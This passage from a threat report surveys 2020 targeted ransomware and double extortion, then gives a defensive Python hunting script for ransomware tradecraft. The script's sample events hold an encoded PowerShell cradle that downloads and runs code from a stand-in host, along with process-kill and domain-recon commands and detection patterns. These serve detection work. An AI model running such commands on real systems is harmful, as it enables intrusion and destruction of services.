Many new ransomware families emerged in 2016, and in 2017 WannaCry/Wcry wreaked havoc across the globe. In response to these massive ransomware attacks, organizations strengthened their defenses. By 2018, ransomware development seemed to have slowed down, as cryptocurrency miners overtook ransomware in terms of detections and the number of new ransomware families decreased. However, we soon learned that the trend only signified a major turning point for ransomware. That same year, Ryuk appeared and set a new standard. Ryuk was among the first documented ransomware families that operated like a targeted attack. It used Trickbot and its modules to propagate and to install PowerShell Empire, and it used PowerShell and WMI extensively for lateral movement.

By 2019, ransomware attacks had taken on a more targeted approach, which became the norm entering 2020. We will discuss Ryuk and RansomEXX attacks as two of our chosen case studies that demonstrate this trend in 2020 in a later section.

Figure 1.

The year seemed conducive to the development of new ransomware aimed at a narrowing range of targets. Overall, we saw an increase in new ransomware families, from 95 in 2019 to 127 in 2020, despite the decreased detection of ransomware-related components.

Double extortion stood out as the common ransomware theme in 2020, as data breaches became a significant part of the campaigns. Cybercriminals didn't just deny access by encrypting their victims' files; they also started to threaten to expose the files if the target didn't pay the ransom. This increased the stakes and added pressure on victims to make a deal. It is a real threat, especially for larger organizations that keep sensitive personal and proprietary information, since such attacks can cost organizations more money and tarnish their reputation and brand image.

Maze is an example of a ransomware family that used this tactic and made good on its threat to publicize stolen files. It began operating in 2019, when it conducted several high-profile attacks and even publicly named its victims. In October 2020 it ceased operations, only for a new malware, Egregor, to take its place. Other notable variants used in double extortion campaigns are Nefilim, Sodinokibi, Nemty, RansomEXX, and DoppelPaymer, some of which we will discuss further as case studies.

Figure 2.

This timeline (Nov 2019 to Oct 2020) shows that ransomware attacks that involved double extortion happened months apart. The conditions for double extortion were likely created by the targeted approach that ransomware has adopted. Threat actors utilized familiar tactics, techniques, and procedures (TTPs) no different from those of advanced persistent threats (APTs) or other targeted attacks.

In most cases, the attackers already have some level of knowledge about their target's environment. If their information is lacking, they use hacking tools such as network scanners, or legitimate administrative tools, for reconnaissance. Once they have enough information, they use living-off-the-land techniques and compromised accounts to move laterally, search for the information they need, exfiltrate data, and finally deploy their ransomware. RansomEXX is an example of a ransomware variant that used several legitimate tools to quickly deploy its final payload.

Targeted, human-operated ransomware has been reported for more than a year. However, 2020 saw a wider variety of tools used for various purposes, such as reconnaissance and process termination. Campaigns are beginning to look a lot more customized, seeing how the operators change their techniques according to the environment. A good example is a Sodinokibi attack that used a software product's own uninstaller to disable existing applications on the victim's machines. We discuss this further as our first case study in a later section.

Threat actors can use several methods to penetrate a system's defenses. Depending on their target, they can use familiar techniques and entry points such as phishing emails, vulnerabilities, or compromised accounts. Examples of ransomware attacks from 2020 that started with phishing emails include Ryuk, Egregor, RansomEXX, and DoppelPaymer. Ransomware families like Sodinokibi and RansomEXX have been seen consistently exploiting vulnerabilities in remote access tools for their attacks; common vulnerabilities observed in ransomware attacks from last year include CVE-2019-19781 and CVE-2019-11510. A common tactic for ransomware also involved the use of open, unsecured RDP ports. Credentials for these are typically found in underground forums, obtained from other data exfiltration campaigns.
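The tradecraft described above (Ryuk's PowerShell and WMI lateral movement, built-in recon tools when the operator lacks knowledge of the environment, and process termination before encryption) all lands in process-creation telemetry, which is where a defender can hunt for it. The following Python is an added example and not code from this report or from Trend Micro: it assumes events have already been normalised to four fields (host, parent image, image, command line), roughly what Windows Security Event 4688 or Sysmon Event 1 provide, and the sample events, the tool list and the field names are constructed assumptions, not observed telemetry.

```python
"""Hunt for living-off-the-land ransomware tradecraft in process-creation events.

Added example, not from the report. Assumes pre-normalised events with the
fields host / parent / image / cmdline; all sample data below is constructed.
"""
import base64
import re

# PowerShell accepts -e, -ec, -enc and -EncodedCommand for a base64 (UTF-16LE) script block.
ENCODED_ARG = re.compile(r"(?i)(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)")
# Built-in tools commonly used for discovery once an operator has a foothold (assumed list).
RECON_TOOLS = {"net.exe", "net1.exe", "nltest.exe", "adfind.exe", "whoami.exe", "nmap.exe"}
# A process whose parent is one of these was started remotely (WMI or a PsExec-style service).
REMOTE_EXEC_PARENTS = {"wmiprvse.exe", "psexesvc.exe"}


def _enc(script):
    """Encode a script the way a stager passes it to -EncodedCommand (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample events, not real telemetry.
SAMPLE_EVENTS = [
    {"host": "ws01", "parent": "explorer.exe", "image": "OUTLOOK.EXE", "cmdline": "OUTLOOK.EXE"},
    # remote WMI execution shows up on the target as a child of WmiPrvSE.exe
    {"host": "srv02", "parent": "WmiPrvSE.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -NoP -W Hidden -Enc "
                + _enc("IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/a')")},
    {"host": "ws01", "parent": "cmd.exe", "image": "net.exe", "cmdline": 'net group "Domain Admins" /domain'},
    {"host": "ws01", "parent": "cmd.exe", "image": "nltest.exe", "cmdline": "nltest /dclist:corp"},
    {"host": "ws03", "parent": "cmd.exe", "image": "taskkill.exe", "cmdline": "taskkill /F /IM sqlservr.exe"},
    {"host": "ws01", "parent": "services.exe", "image": "svchost.exe", "cmdline": "svchost.exe -k netsvcs"},
]


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if there is none (or it is not valid)."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(event):
    """Return (stage, detail) pairs for one event; a single event can hit several stages."""
    parent, image = event["parent"].lower(), event["image"].lower()
    cmd = event["cmdline"]
    lcmd = cmd.lower()
    hits = []
    if parent in REMOTE_EXEC_PARENTS or re.search(r"\bwmic(?:\.exe)?\b.*/node:", lcmd):
        hits.append(("lateral_movement", f"{image} started remotely via {parent}"))
    if image in ("powershell.exe", "pwsh.exe"):
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            hits.append(("execution", "encoded PowerShell: " + decoded))
        elif re.search(r"downloadstring|invoke-expression|\biex\b|-w(?:indowstyle)?\s+hidden", lcmd):
            hits.append(("execution", "suspicious PowerShell: " + cmd))
    # killing services/processes (databases, backup, AV) precedes encryption; "net stop" counts here
    if (image == "taskkill.exe" and "/im" in lcmd) or (image in ("net.exe", "net1.exe") and " stop " in lcmd):
        hits.append(("process_termination", cmd))
    elif image in RECON_TOOLS:
        hits.append(("discovery", cmd))
    return hits


def hunt(events):
    """Run classify() over a list of events and flatten the results into finding records."""
    findings = []
    for ev in events:
        for stage, detail in classify(ev):
            findings.append({"host": ev["host"], "image": ev["image"], "stage": stage, "detail": detail})
    return findings


def stages_by_host(findings):
    """Group stages per host; one host hitting several stages is the intrusion-chain signal."""
    out = {}
    for f in findings:
        out.setdefault(f["host"], set()).add(f["stage"])
    return {h: sorted(s) for h, s in out.items()}


if __name__ == "__main__":
    results = hunt(SAMPLE_EVENTS)
    for f in results:
        print(f"{f['host']:6} {f['stage']:20} {f['detail']}")
    print(stages_by_host(results))
```

Decoding the `-EncodedCommand` argument rather than matching on its presence is the design point: the base64 blob changes with every stager, but the decoded download cradle is what tells an analyst which host pulled the Empire payload, and grouping stages per host separates a lone admin running `nltest` from a machine that was reached over WMI and then ran a hidden encoded PowerShell.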